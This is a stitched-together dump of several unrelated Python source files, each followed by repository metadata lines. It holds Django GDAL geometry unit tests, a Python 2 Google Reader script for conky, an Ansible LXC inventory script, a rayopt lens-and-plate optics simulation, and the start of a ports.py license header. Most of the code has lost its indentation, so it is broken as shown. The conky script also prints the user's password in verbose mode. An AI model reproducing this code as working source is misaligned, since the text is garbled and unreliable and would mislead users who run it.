self.assertEqual(OGRGeomType(1), OGRGeomType(1))
self.assertEqual(OGRGeomType(7), 'GeometryCollection')
self.assertEqual(OGRGeomType('point'), 'POINT')
self.assertNotEqual(OGRGeomType('point'), 2)
self.assertEqual(OGRGeomType('unknown'), 0)
self.assertEqual(OGRGeomType(6), 'MULtiPolyGON')
self.assertEqual(OGRGeomType(1), OGRGeomType('point'))
self.assertNotEqual(OGRGeomType('POINT'), OGRGeomType(6))
# Testing the Django field name equivalent property.
self.assertEqual('PointField', OGRGeomType('Point').django)
self.assertEqual('GeometryField', OGRGeomType('Geometry').django)
self.assertEqual('GeometryField', OGRGeomType('Unknown').django)
self.assertIsNone(OGRGeomType('none').django)
# 'Geometry' initialization implies an unknown geometry type.
gt = OGRGeomType('Geometry')
self.assertEqual(0, gt.num)
self.assertEqual('Unknown', gt.name)
def test_geomtype_25d(self):
"Testing OGRGeomType object with 25D types."
wkb25bit = OGRGeomType.wkb25bit
self.assertEqual(OGRGeomType(wkb25bit + 1), 'Point25D')
self.assertEqual(OGRGeomType('MultiLineString25D'), (5 + wkb25bit))
self.assertEqual('GeometryCollectionField', OGRGeomType('GeometryCollection25D').django)
def test_wkt(self):
"Testing WKT output."
for g in self.geometries.wkt_out:
geom = OGRGeometry(g.wkt)
self.assertEqual(g.wkt, geom.wkt)
def test_ewkt(self):
"Testing EWKT input/output."
for ewkt_val in ('POINT (1 2 3)', 'LINEARRING (0 0,1 1,2 1,0 0)'):
# First with ewkt output when no SRID in EWKT
self.assertEqual(ewkt_val, OGRGeometry(ewkt_val).ewkt)
            # Now test with an SRID specified.
ewkt_val = 'SRID=4326;%s' % ewkt_val
geom = OGRGeometry(ewkt_val)
self.assertEqual(ewkt_val, geom.ewkt)
self.assertEqual(4326, geom.srs.srid)
def test_gml(self):
"Testing GML output."
for g in self.geometries.wkt_out:
geom = OGRGeometry(g.wkt)
exp_gml = g.gml
if GDAL_VERSION >= (1, 8):
# In GDAL 1.8, the non-conformant GML tag <gml:GeometryCollection> was
# replaced with <gml:MultiGeometry>.
exp_gml = exp_gml.replace('GeometryCollection', 'MultiGeometry')
self.assertEqual(exp_gml, geom.gml)
def test_hex(self):
"Testing HEX input/output."
for g in self.geometries.hex_wkt:
geom1 = OGRGeometry(g.wkt)
self.assertEqual(g.hex.encode(), geom1.hex)
# Constructing w/HEX
geom2 = OGRGeometry(g.hex)
self.assertEqual(geom1, geom2)
def test_wkb(self):
"Testing WKB input/output."
for g in self.geometries.hex_wkt:
geom1 = OGRGeometry(g.wkt)
wkb = geom1.wkb
self.assertEqual(b2a_hex(wkb).upper(), g.hex.encode())
# Constructing w/WKB.
geom2 = OGRGeometry(wkb)
self.assertEqual(geom1, geom2)
def test_json(self):
"Testing GeoJSON input/output."
for g in self.geometries.json_geoms:
geom = OGRGeometry(g.wkt)
if not hasattr(g, 'not_equal'):
# Loading jsons to prevent decimal differences
self.assertEqual(json.loads(g.json), json.loads(geom.json))
self.assertEqual(json.loads(g.json), json.loads(geom.geojson))
self.assertEqual(OGRGeometry(g.wkt), OGRGeometry(geom.json))
# Test input with some garbage content (but valid json) (#15529)
geom = OGRGeometry('{"type": "Point", "coordinates": [ 100.0, 0.0 ], "other": "<test>"}')
self.assertIsInstance(geom, OGRGeometry)
def test_points(self):
"Testing Point objects."
OGRGeometry('POINT(0 0)')
for p in self.geometries.points:
if not hasattr(p, 'z'): # No 3D
pnt = OGRGeometry(p.wkt)
self.assertEqual(1, pnt.geom_type)
self.assertEqual('POINT', pnt.geom_name)
self.assertEqual(p.x, pnt.x)
self.assertEqual(p.y, pnt.y)
self.assertEqual((p.x, p.y), pnt.tuple)
def test_multipoints(self):
"Testing MultiPoint objects."
for mp in self.geometries.multipoints:
mgeom1 = OGRGeometry(mp.wkt) # First one from WKT
self.assertEqual(4, mgeom1.geom_type)
self.assertEqual('MULTIPOINT', mgeom1.geom_name)
mgeom2 = OGRGeometry('MULTIPOINT') # Creating empty multipoint
mgeom3 = OGRGeometry('MULTIPOINT')
for g in mgeom1:
mgeom2.add(g) # adding each point from the multipoints
mgeom3.add(g.wkt) # should take WKT as well
            self.assertEqual(mgeom1, mgeom2) # they should be equal
self.assertEqual(mgeom1, mgeom3)
self.assertEqual(mp.coords, mgeom2.coords)
self.assertEqual(mp.n_p, mgeom2.point_count)
def test_linestring(self):
"Testing LineString objects."
prev = OGRGeometry('POINT(0 0)')
for ls in self.geometries.linestrings:
linestr = OGRGeometry(ls.wkt)
self.assertEqual(2, linestr.geom_type)
self.assertEqual('LINESTRING', linestr.geom_name)
self.assertEqual(ls.n_p, linestr.point_count)
self.assertEqual(ls.coords, linestr.tuple)
self.assertEqual(linestr, OGRGeometry(ls.wkt))
self.assertNotEqual(linestr, prev)
self.assertRaises(OGRIndexError, linestr.__getitem__, len(linestr))
prev = linestr
# Testing the x, y properties.
x = [tmpx for tmpx, tmpy in ls.coords]
y = [tmpy for tmpx, tmpy in ls.coords]
self.assertEqual(x, linestr.x)
self.assertEqual(y, linestr.y)
def test_multilinestring(self):
"Testing MultiLineString objects."
prev = OGRGeometry('POINT(0 0)')
for mls in self.geometries.multilinestrings:
mlinestr = OGRGeometry(mls.wkt)
self.assertEqual(5, mlinestr.geom_type)
self.assertEqual('MULTILINESTRING', mlinestr.geom_name)
self.assertEqual(mls.n_p, mlinestr.point_count)
self.assertEqual(mls.coords, mlinestr.tuple)
self.assertEqual(mlinestr, OGRGeometry(mls.wkt))
self.assertNotEqual(mlinestr, prev)
prev = mlinestr
for ls in mlinestr:
self.assertEqual(2, ls.geom_type)
self.assertEqual('LINESTRING', ls.geom_name)
self.assertRaises(OGRIndexError, mlinestr.__getitem__, len(mlinestr))
def test_linearring(self):
"Testing LinearRing objects."
prev = OGRGeometry('POINT(0 0)')
for rr in self.geometries.linearrings:
lr = OGRGeometry(rr.wkt)
# self.assertEqual(101, lr.geom_type.num)
self.assertEqual('LINEARRING', lr.geom_name)
self.assertEqual(rr.n_p, len(lr))
self.assertEqual(lr, OGRGeometry(rr.wkt))
self.assertNotEqual(lr, prev)
prev = lr
def test_polygons(self):
"Testing Polygon objects."
# Testing `from_bbox` class method
bbox = (-180, -90, 180, 90)
p = OGRGeometry.from_bbox(bbox)
self.assertEqual(bbox, p.extent)
prev = OGRGeometry('POINT(0 0)')
for p in self.geometries.polygons:
poly = OGRGeometry(p.wkt)
self.assertEqual(3, poly.geom_type)
self.assertEqual('POLYGON', poly.geom_name)
self.assertEqual(p.n_p, poly.point_count)
self.assertEqual(p.n_i + 1, len(poly))
# Testing area & centroid.
self.assertAlmostEqual(p.area, poly.area, 9)
x, y = poly.centroid.tuple
self.assertAlmostEqual(p.centroid[0], x, 9)
self.assertAlmostEqual(p.centroid[1], y, 9)
# Testing equivalence
self.assertEqual(poly, OGRGeometry(p.wkt))
self.assertNotEqual(poly, prev)
if p.ext_ring_cs:
ring = poly[0]
self.assertEqual(p.ext_ring_cs, ring.tuple)
self.assertEqual(p.ext_ring_cs, poly[0].tuple)
self.assertEqual(len(p.ext_ring_cs), ring.point_count)
for r in poly:
self.assertEqual('LINEARRING', r.geom_name)
def test_closepolygons(self):
"Testing closing Polygon objects."
        # Neither ring in this geometry is closed.
poly = OGRGeometry('POLYGON((0 0, 5 0, 5 5, 0 5), (1 1, 2 1, 2 2, 2 1))')
self.assertEqual(8, poly.point_count)
with self.assertRaises(GDALException):
poly.centroid
poly.close_rings()
self.assertEqual(10, poly.point_count) # Two closing points should've been added
self.assertEqual(OGRGeometry('POINT(2.5 2.5)'), poly.centroid)
def test_multipolygons(self):
"Testing MultiPolygon objects."
OGRGeometry('POINT(0 0)')
for mp in self.geometries.multipolygons:
mpoly = OGRGeometry(mp.wkt)
self.assertEqual(6, mpoly.geom_type)
self.assertEqual('MULTIPOLYGON', mpoly.geom_name)
if mp.valid:
self.assertEqual(mp.n_p, mpoly.point_count)
self.assertEqual(mp.num_geom, len(mpoly))
self.assertRaises(OGRIndexError, mpoly.__getitem__, len(mpoly))
for p in mpoly:
self.assertEqual('POLYGON', p.geom_name)
self.assertEqual(3, p.geom_type)
self.assertEqual(mpoly.wkt, OGRGeometry(mp.wkt).wkt)
def test_srs(self):
"Testing OGR Geometries with Spatial Reference objects."
for mp in self.geometries.multipolygons:
# Creating a geometry w/spatial reference
sr = SpatialReference('WGS84')
mpoly = OGRGeometry(mp.wkt, sr)
self.assertEqual(sr.wkt, mpoly.srs.wkt)
# Ensuring that SRS is propagated to clones.
klone = mpoly.clone()
self.assertEqual(sr.wkt, klone.srs.wkt)
# Ensuring all children geometries (polygons and their rings) all
# return the assigned spatial reference as well.
for poly in mpoly:
self.assertEqual(sr.wkt, poly.srs.wkt)
for ring in poly:
self.assertEqual(sr.wkt, ring.srs.wkt)
# Ensuring SRS propagate in topological ops.
a = OGRGeometry(self.geometries.topology_geoms[0].wkt_a, sr)
b = OGRGeometry(self.geometries.topology_geoms[0].wkt_b, sr)
diff = a.difference(b)
union = a.union(b)
self.assertEqual(sr.wkt, diff.srs.wkt)
self.assertEqual(sr.srid, union.srs.srid)
# Instantiating w/an integer SRID
mpoly = OGRGeometry(mp.wkt, 4326)
self.assertEqual(4326, mpoly.srid)
mpoly.srs = SpatialReference(4269)
self.assertEqual(4269, mpoly.srid)
self.assertEqual('NAD83', mpoly.srs.name)
# Incrementing through the multipolygon after the spatial reference
# has been re-assigned.
for poly in mpoly:
self.assertEqual(mpoly.srs.wkt, poly.srs.wkt)
poly.srs = 32140
for ring in poly:
# Changing each ring in the polygon
self.assertEqual(32140, ring.srs.srid)
self.assertEqual('NAD83 / Texas South Central', ring.srs.name)
ring.srs = str(SpatialReference(4326)) # back to WGS84
self.assertEqual(4326, ring.srs.srid)
# Using the `srid` property.
ring.srid = 4322
self.assertEqual('WGS 72', ring.srs.name)
self.assertEqual(4322, ring.srid)
def test_srs_transform(self):
"Testing transform()."
orig = OGRGeometry('POINT (-104.609 38.255)', 4326)
trans = OGRGeometry('POINT (992385.4472045 481455.4944650)', 2774)
# Using an srid, a SpatialReference object, and a CoordTransform object
# or transformations.
t1, t2, t3 = orig.clone(), orig.clone(), orig.clone()
t1.transform(trans.srid)
t2.transform(SpatialReference('EPSG:2774'))
ct = CoordTransform(SpatialReference('WGS84'), SpatialReference(2774))
t3.transform(ct)
# Testing use of the `clone` keyword.
k1 = orig.clone()
k2 = k1.transform(trans.srid, clone=True)
self.assertEqual(k1, orig)
self.assertNotEqual(k1, k2)
prec = 3
for p in (t1, t2, t3, k2):
self.assertAlmostEqual(trans.x, p.x, prec)
self.assertAlmostEqual(trans.y, p.y, prec)
def test_transform_dim(self):
"Testing coordinate dimension is the same on transformed geometries."
ls_orig = OGRGeometry('LINESTRING(-104.609 38.255)', 4326)
ls_trans = OGRGeometry('LINESTRING(992385.4472045 481455.4944650)', 2774)
prec = 3
ls_orig.transform(ls_trans.srs)
# Making sure the coordinate dimension is still 2D.
self.assertEqual(2, ls_orig.coord_dim)
self.assertAlmostEqual(ls_trans.x[0], ls_orig.x[0], prec)
self.assertAlmostEqual(ls_trans.y[0], ls_orig.y[0], prec)
def test_difference(self):
"Testing difference()."
for i in range(len(self.geometries.topology_geoms)):
a = OGRGeometry(self.geometries.topology_geoms[i].wkt_a)
b = OGRGeometry(self.geometries.topology_geoms[i].wkt_b)
d1 = OGRGeometry(self.geometries.diff_geoms[i].wkt)
d2 = a.difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a - b) # __sub__ is difference operator
a -= b # testing __isub__
self.assertEqual(d1, a)
def test_intersection(self):
"Testing intersects() and intersection()."
for i in range(len(self.geometries.topology_geoms)):
a = OGRGeometry(self.geometries.topology_geoms[i].wkt_a)
b = OGRGeometry(self.geometries.topology_geoms[i].wkt_b)
i1 = OGRGeometry(self.geometries.intersect_geoms[i].wkt)
self.assertTrue(a.intersects(b))
i2 = a.intersection(b)
self.assertEqual(i1, i2)
self.assertEqual(i1, a & b) # __and__ is intersection operator
a &= b # testing __iand__
self.assertEqual(i1, a)
def test_symdifference(self):
"Testing sym_difference()."
for i in range(len(self.geometries.topology_geoms)):
a = OGRGeometry(self.geometries.topology_geoms[i].wkt_a)
b = OGRGeometry(self.geometries.topology_geoms[i].wkt_b)
d1 = OGRGeometry(self.geometries.sdiff_geoms[i].wkt)
d2 = a.sym_difference(b)
self.assertEqual(d1, d2)
self.assertEqual(d1, a ^ b) # __xor__ is symmetric difference operator
a ^= b # testing __ixor__
self.assertEqual(d1, a)
def test_union(self):
"Testing union()."
for i in range(len(self.geometries.topology_geoms)):
a = OGRGeometry(self.geometries.topology_geoms[i].wkt_a)
b = OGRGeometry(self.geometries.topology_geoms[i].wkt_b)
u1 = OGRGeometry(self.geometries.union_geoms[i].wkt)
u2 = a.union(b)
self.assertEqual(u1, u2)
self.assertEqual(u1, a | b) # __or__ is union operator
a |= b # testing __ior__
self.assertEqual(u1, a)
def test_add(self):
"Testing GeometryCollection.add()."
# Can't insert a Point into a MultiPolygon.
mp = OGRGeometry('MultiPolygon')
pnt = OGRGeometry('POINT(5 23)')
self.assertRaises(GDALException, mp.add, pnt)
# GeometryCollection.add may take an OGRGeometry (if another collection
# of the same type all child geoms will be added individually) or WKT.
for mp in self.geometries.multipolygons:
mpoly = OGRGeometry(mp.wkt)
mp1 = OGRGeometry('MultiPolygon')
mp2 = OGRGeometry('MultiPolygon')
mp3 = OGRGeometry('MultiPolygon')
for poly in mpoly:
mp1.add(poly) # Adding a geometry at a time
mp2.add(poly.wkt) # Adding WKT
mp3.add(mpoly) # Adding a MultiPolygon's entire contents at once.
for tmp in (mp1, mp2, mp3):
self.assertEqual(mpoly, tmp)
def test_extent(self):
"Testing `extent` property."
# The xmin, ymin, xmax, ymax of the MultiPoint should be returned.
mp = OGRGeometry('MULTIPOINT(5 23, 0 0, 10 50)')
self.assertEqual((0.0, 0.0, 10.0, 50.0), mp.extent)
# Testing on the 'real world' Polygon.
poly = OGRGeometry(self.geometries.polygons[3].wkt)
ring = poly.shell
x, y = ring.x, ring.y
xmin, ymin = min(x), min(y)
xmax, ymax = max(x), max(y)
self.assertEqual((xmin, ymin, xmax, ymax), poly.extent)
def test_25D(self):
"Testing 2.5D geometries."
pnt_25d = OGRGeometry('POINT(1 2 3)')
self.assertEqual('Point25D', pnt_25d.geom_type.name)
self.assertEqual(3.0, pnt_25d.z)
self.assertEqual(3, pnt_25d.coord_dim)
ls_25d = OGRGeometry('LINESTRING(1 1 1,2 2 2,3 3 3)')
self.assertEqual('LineString25D', ls_25d.geom_type.name)
self.assertEqual([1.0, 2.0, 3.0], ls_25d.z)
self.assertEqual(3, ls_25d.coord_dim)
def test_pickle(self):
"Testing pickle support."
g1 = OGRGeometry('LINESTRING(1 1 1,2 2 2,3 3 3)', 'WGS84')
g2 = pickle.loads(pickle.dumps(g1))
self.assertEqual(g1, g2)
self.assertEqual(4326, g2.srs.srid)
self.assertEqual(g1.srs.wkt, g2.srs.wkt)
def test_ogrgeometry_transform_workaround(self):
"Testing coordinate dimensions on geometries after transformation."
# A bug in GDAL versions prior to 1.7 changes the coordinate
# dimension of a geometry after it has been transformed.
# This test ensures that the bug workarounds employed within
# `OGRGeometry.transform` indeed work.
wkt_2d = "MULTILINESTRING ((0 0,1 1,2 2))"
wkt_3d = "MULTILINESTRING ((0 0 0,1 1 1,2 2 2))"
srid = 4326
# For both the 2D and 3D MultiLineString, ensure _both_ the dimension
# of the collection and the component LineString have the expected
# coordinate dimension after transform.
geom = OGRGeometry(wkt_2d, srid)
geom.transform(srid)
self.assertEqual(2, geom.coord_dim)
self.assertEqual(2, geom[0].coord_dim)
self.assertEqual(wkt_2d, geom.wkt)
geom = OGRGeometry(wkt_3d, srid)
geom.transform(srid)
self.assertEqual(3, geom.coord_dim)
self.assertEqual(3, geom[0].coord_dim)
self.assertEqual(wkt_3d, geom.wkt)
def test_equivalence_regression(self):
"Testing equivalence methods with non-OGRGeometry instances."
self.assertIsNotNone(OGRGeometry('POINT(0 0)'))
self.assertNotEqual(OGRGeometry('LINESTRING(0 0, 1 1)'), 3)
|
bsd-3-clause
|
vanloswang/conky_all
|
conky_colors/conkycolors/scripts/conkyGoogleReader.py
|
7
|
12797
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
###############################################################################
# conkyGoogleReader.py is a simple python script to gather
# details of google reader subscriptions for use in conky.
#
# Author: Kaivalagi
# Created: 09/07/2008
#
# 18/05/2009 Updated to expand ~ based template paths
# 14/12/2009 Updated to work with new authentication requirements, old method stopped working for some reason
from datetime import datetime
from optparse import OptionParser
from xml.dom import minidom
from keyring import get_password
import codecs
import socket
import sys
import traceback
import urllib
import urllib2
import os
class CommandLineParser:
parser = None
def __init__(self):
self.parser = OptionParser()
self.parser.add_option("-u","--username",dest="username", type="string", metavar="USERNAME", help=u"username to login with")
self.parser.add_option("-p","--password",dest="password", type="string", metavar="PASSWORD", help=u"Password to login with, if not set the username is used to fetch a 'conky' password from the keyring")
self.parser.add_option("-t","--template",dest="template", type="string", metavar="FILE", help=u"Template file determining the format for each rss feed summary. Use the following placeholders: [unreadcount], [name], [url]")
self.parser.add_option("-s","--summarytemplate",dest="summarytemplate", type="string", metavar="FILE", help=u"Template file determining the format for summary output. Use the following placeholders: [totalfeedscount], [unreadfeedscount], [unreadfeeditemscount]")
self.parser.add_option("-S","--summaryoutput",dest="summaryoutput", default=False, action="store_true", help=u"Request summary output rather than each feeds details")
self.parser.add_option("-c","--connectiontimeout",dest="connectiontimeout", type="int", default=10, metavar="NUMBER", help=u"[default: %default] Define the number of seconds before a connection timeout can occur.")
self.parser.add_option("-v","--verbose",dest="verbose", default=False, action="store_true", help=u"Request verbose output, no a good idea when running through conky!")
self.parser.add_option("-V", "--version", dest="version", default=False, action="store_true", help=u"Displays the version of the script.")
self.parser.add_option("--errorlogfile", dest="errorlogfile", type="string", metavar="FILE", help=u"If a filepath is set, the script appends errors to the filepath.")
self.parser.add_option("--infologfile", dest="infologfile", type="string", metavar="FILE", help=u"If a filepath is set, the script appends info to the filepath.")
def parse_args(self):
(options, args) = self.parser.parse_args()
return (options, args)
def print_help(self):
return self.parser.print_help()
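# A hypothetical invocation, using the options defined above:
#   ./conkyGoogleReader.py -u someone@gmail.com -S
# would print a single summary line built from the default summary template.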
class FeedData:
def __init__(self, name, url, unreadcount):
self.name = name
self.url = url
self.unreadcount = unreadcount
def __cmp__(self, other):
return cmp(int(other.unreadcount),int(self.unreadcount))
def __str__(self):
return str(self.name + " - " + self.unreadcount)
class GoogleReader:
def __init__(self,options):
try:
self.options = options
# obtain a password from the keyring if none is set
if self.options.password == None:
self.logInfo("Attempting to obtain a password through the conky keyring as none was provided")
try:
password = get_password("conky", self.options.username)
except Exception, e:
self.logError("Failed to retrieve password from keyring:" + traceback.format_exc())
if password == None:
self.logError("No password was found in the conky keyring")
else:
self.options.password = password
self.logInfo("Initialising google reader...")
socket.setdefaulttimeout(self.options.connectiontimeout)
except Exception,e:
self.logError("GoogleReader Initialisation:Unexpected error:" + e.__str__()+traceback.format_exc())
def writeOutput(self):
auth_header = self.getAuthorizationHeader()
if auth_header != None:
self.logInfo("Processing output...")
if self.options.template == None:
# create default template
template = "[unreadcount] [name] - [url]\n"
else:
# load the template file contents
try:
#fileinput = open(self.options.template)
fileinput = codecs.open(os.path.expanduser(self.options.template), encoding='utf-8')
template = fileinput.read()
fileinput.close()
# lose the final "\n" which should always be there...
template = template[0:len(template)-1]
except:
self.logError("Template file no found!")
sys.exit(2)
if self.options.summarytemplate == None:
# create default template
summarytemplate = "[unreadfeeditemscount] unread feed items, [unreadfeedscount]/[totalfeedscount] feeds have unread content.\n"
else:
# load the template file contents
try:
#fileinput = open(self.options.template)
fileinput = codecs.open(os.path.expanduser(self.options.summarytemplate), encoding='utf-8')
summarytemplate = fileinput.read()
fileinput.close()
# lose the final "\n" which should always be there...
summarytemplate = summarytemplate[0:len(summarytemplate)-1]
except:
self.logError("Template file no found!")
sys.exit(2)
totalfeedscount, unreadfeedscount, unreadfeeditemscount, feeds = self.getUnreadItems(auth_header)
output = ""
if self.options.summaryoutput == True:
output = self.getOutputFromSummaryTemplate(summarytemplate, totalfeedscount, unreadfeedscount, unreadfeeditemscount)
else:
for feeddata in feeds:
output = output + self.getOutputFromTemplate(template, feeddata.unreadcount, feeddata.name, feeddata.url)
print output.encode("utf-8")
def getOutputFromTemplate(self, template, unreadcount, name, url):
try:
output = template
output = output.replace("[unreadcount]",unreadcount)
output = output.replace("[name]",name)
output = output.replace("[url]",url)
return output
except Exception,e:
self.logError("getOutputFromTemplate:Unexpected error:" + e.__str__())
return ""
def getOutputFromSummaryTemplate(self, summarytemplate, totalfeedscount, unreadfeedscount, unreadfeeditemscount):
try:
output = summarytemplate
output = output.replace("[totalfeedscount]",totalfeedscount)
output = output.replace("[unreadfeedscount]",unreadfeedscount)
output = output.replace("[unreadfeeditemscount]",unreadfeeditemscount)
return output
except Exception,e:
self.logError("getOutputFromSummaryTemplate:Unexpected error:" + e.__str__())
return ""
def getAuthorizationHeader(self):
# Authenticate to obtain SID
auth_url = 'https://www.google.com/accounts/ClientLogin'
auth_req_data = urllib.urlencode({'Email': self.options.username,
'Passwd': self.options.password,
'service': 'reader'})
auth_req = urllib2.Request(auth_url, data=auth_req_data)
auth_resp = urllib2.urlopen(auth_req)
auth_resp_content = auth_resp.read()
auth_resp_dict = dict(x.split('=') for x in auth_resp_content.split('\n') if x)
AUTH = auth_resp_dict["Auth"]
# Create a header using the AUTH key
header = {"Authorization" : "GoogleLogin auth=%s"%AUTH}
return header
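    # The header built above is a plain dict ready for urllib2, e.g.
    #   {"Authorization": "GoogleLogin auth=<auth-token>"}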
def getUnreadItems(self, auth_header):
url = "https://www.google.com/reader/api/0/unread-count?all=true"
request = urllib2.Request(url, None, auth_header)
response = urllib2.urlopen(request)
unreadxml = response.read()
url = "https://www.google.com/reader/api/0/subscription/list"
request = urllib2.Request(url, None, auth_header)
response = urllib2.urlopen(request)
namesxml = response.read()
if '<object>' in unreadxml:
feedlist = minidom.parseString(unreadxml).getElementsByTagName('string')
namelist = minidom.parseString(namesxml).getElementsByTagName('string')
feeds = []
unreadcount = 0
unreadfeedcount = 0
unreadfeeditemscount = 0
for nodeFeed in feedlist:
feedurl = nodeFeed.firstChild.toxml()
# ignore user/ based nodes, only concerned with feed/ based nodes
if feedurl.startswith("feed/") == True:
unreadcount = nodeFeed.nextSibling.firstChild.toxml()
for nodeName in namelist:
nodeText = nodeName.firstChild.toxml()
if nodeText.startswith("feed/"):
if nodeText == feedurl:
feedname = nodeName.nextSibling.firstChild.toxml()
break
                    # lstrip() removes a set of characters, not a prefix;
                    # slice off the literal "feed/" prefix instead
                    feedurl = feedurl[len("feed/"):]
#feeds.append((unreadcount , feedurl, feedname))
feedData = FeedData(feedname, feedurl, unreadcount)
feeds.append(feedData)
unreadfeeditemscount = unreadfeeditemscount + int(unreadcount)
unreadfeedcount = unreadfeedcount + 1
else:
pass #invalid feedurl?
totalfeedcount = len(namelist)
feeds.sort()
return str(totalfeedcount), str(unreadfeedcount), str(unreadfeeditemscount), feeds
else:
            # keep the return arity consistent with the success path so the
            # caller can always unpack four values
            return "0", "0", "0", []
def logInfo(self, text):
if self.options.verbose == True:
print >> sys.stdout, "INFO: " + text
if self.options.infologfile != None:
datetimestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
fileoutput = open(self.options.infologfile, "ab")
fileoutput.write(datetimestamp+" INFO: "+text+"\n")
fileoutput.close()
def logError(self, text):
print >> sys.stderr, "ERROR: " + text
if self.options.errorlogfile != None:
datetimestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
fileoutput = open(self.options.errorlogfile, "ab")
fileoutput.write(datetimestamp+" ERROR: "+text+"\n")
fileoutput.close()
def main():
parser = CommandLineParser()
(options, args) = parser.parse_args()
if options.version == True:
print >> sys.stdout,"conkyGoogleReader v.1.08"
else:
if options.username == None:
print >> sys.stdout, "A username was not given!"
sys.exit(2)
if options.verbose == True:
print >> sys.stdout, "username:",options.username
print >> sys.stdout, "password:",options.password
print >> sys.stdout, "template:",options.template
print >> sys.stdout, "summarytemplate:",options.summarytemplate
print >> sys.stdout, "summaryoutput:",options.summaryoutput
print >> sys.stdout, "verbose:",options.verbose
# create new google reader object
greader = GoogleReader(options)
greader.writeOutput()
if __name__ == '__main__':
main()
sys.exit()
|
gpl-3.0
|
blakfeld/ansible
|
contrib/inventory/libvirt_lxc.py
|
132
|
1324
|
#!/usr/bin/env python
# (c) 2013, Michael Scherer <[email protected]>
#
# This file is part of Ansible,
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from subprocess import Popen,PIPE
import sys
import json
result = {}
result['all'] = {}
pipe = Popen(['virsh', '-q', '-c', 'lxc:///', 'list', '--name', '--all'], stdout=PIPE, universal_newlines=True)
result['all']['hosts'] = [x[:-1] for x in pipe.stdout.readlines()]
result['all']['vars'] = {}
result['all']['vars']['ansible_connection'] = 'lxc'
if len(sys.argv) == 2 and sys.argv[1] == '--list':
print json.dumps(result)
elif len(sys.argv) == 3 and sys.argv[1] == '--host':
print json.dumps({'ansible_connection': 'lxc'})
else:
print "Need an argument, either --list or --host <host>"
|
gpl-3.0
|
hexastorm/opticaldesign
|
simulation.py
|
1
|
3946
|
%pylab inline
import warnings
import numpy as np
import matplotlib.pyplot as plt
import rayopt as ro
# Lens used 12.5mm Dia. x 90mm FL, VIS-NIR, Inked, Achromatic Lens from Edmund Optics
# LINK: http://www.edmundoptics.com/document/download/391099
filename='zmax_49332ink.zmx'
with open(filename) as file:
data=file.read()
# Parameters:
wavelength=405e-9 # wavelength [m]
D=0.8 # diameter bundle [mm] see, s.scale=0.001 [m]
T=35 # plate thickness [mm]
utilt=np.radians(0) # tilt angle plate [radians]
# Radius of the plate
# I can't remember why I use the tangent; it should not matter
# as long as the diameter is large enough (tan(pi/8) is about 0.414,
# so the plate radius is roughly 0.414*T)
spol=T*np.tan(np.pi/8)
# Create the system
s=ro.zemax.zmx_to_system(data)
s.object.pupil.radius = D/2
# Ensures rays created with function ray_point are in the [-D/2,D/2] range
s.object.pupil.update_radius = False
s.object.angle = np.radians(0) # [radians]
s.wavelengths = [wavelength]
s.update()
# changes needed to make the Zemax data compatible with Rayopt
del s[0]
# set physical size of the offset surface, i.e. the left line in the drawing
s[0].radius = 20 # [mm]
# sets the length between the first virtual offset surface and the lens
s[1].distance = 0 # [mm]
# add parallel plate to the system
s.insert(4,ro.elements.Spheroid(distance=10,material='SCHOTT/N-BK7',
diameter=spol*2,angles=[utilt,0,0]))
s.insert(5,ro.elements.Spheroid(distance=T/np.cos(utilt),material='basic/air',
diameter=spol*2,angles=[utilt,0,0]))
# NOTE: due to the rotation the thickness increases to T/np.cos(utilt);
# if this is not done, the transversal focus shift displacement
# does not agree with the theoretical model
s.update()
#s.align(s.paraxial.n) # used by jordens for astigmatic focus shift, destroys rotation
# astigmatic focus shift , can also be obtained from print(q) and looking at table
#print("Astigmatic focus shift "+str(abs(q.waist_position.T[0][-1])-abs(q.waist_position.T[1][-1])))+" mm.")
# Geometric trace
g = ro.GeometricTrace(s)
# In my system, I am only interested in one field
# with a field angle equal to zero radians
# Several distribution can be chosen; hexapolar, random, radau
# The radau scheme should be able to give a good result while using not so many rays
fieldangle=0
g.rays_point((0, fieldangle), wavelength=wavelength, nrays=20,
distribution="radau", filter=False, clip=False)
# Geometric focus [used]
g.refocus()
q = ro.GaussianTrace(s)
if utilt==0:
fig, ax = plt.subplots()
s.plot(ax)
q.plot(ax, color="red", scale=1)
print("The spot radius is "+str(q.spot_radius[-1][0]*1000))
print("The Gaussian waist radius is "+str(round(q.spot_radius[-1][0]*1000,2))+" micrometers.")
print("The Rayleigh range is "+str(q.rayleigh_range[-1][0])+ " mm.")
# The geometric RMS spotsize is then calculated at the focal point
# i.e. RMS= <(W-<W>)2>1/2
# on default Rayopt specifies the focal point at the last surface
# as it sets i=surface equal to -1.
# all rays are given the same "weight"
print("RMS geometric spotsize is "+str(g.rms()*1000)+" micrometers.")
# The focus point distance is measured with respect to the lens
print("The focus point distance from the lens is "+str(g.path[-1]-g.path[3])+" mm.")
print("The transversal displacement is "+str(g.y[-1,-1,1])+" mm.")
p, qq, opd = g.opd(resample=False)
print("The lambda OPD RMS is "+str(np.sqrt((opd**2 * g.w).sum()/g.w.sum())))
#
p = ro.ParaxialTrace(s)
print("The Airy radius is "+ str(p.airy_radius[1]*1000)+" micrometers.")
# paraxial focus [not used]
#s.paraxial.refocus()
ro.Analysis(s,refocus_full=False, update=False)
# Gaussian trace
# plot only works at ultilt is 0 degrees
# Seidel aberrations
#z = ro.PolyTrace(s)
#str(z)
# Retrieve seidel
#print("\n".join(z.print_seidel()))
|
gpl-3.0
|
davidbz/trafficserver
|
tests/gold_tests/autest-site/ports.py
|
5
|
3718
|
'''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
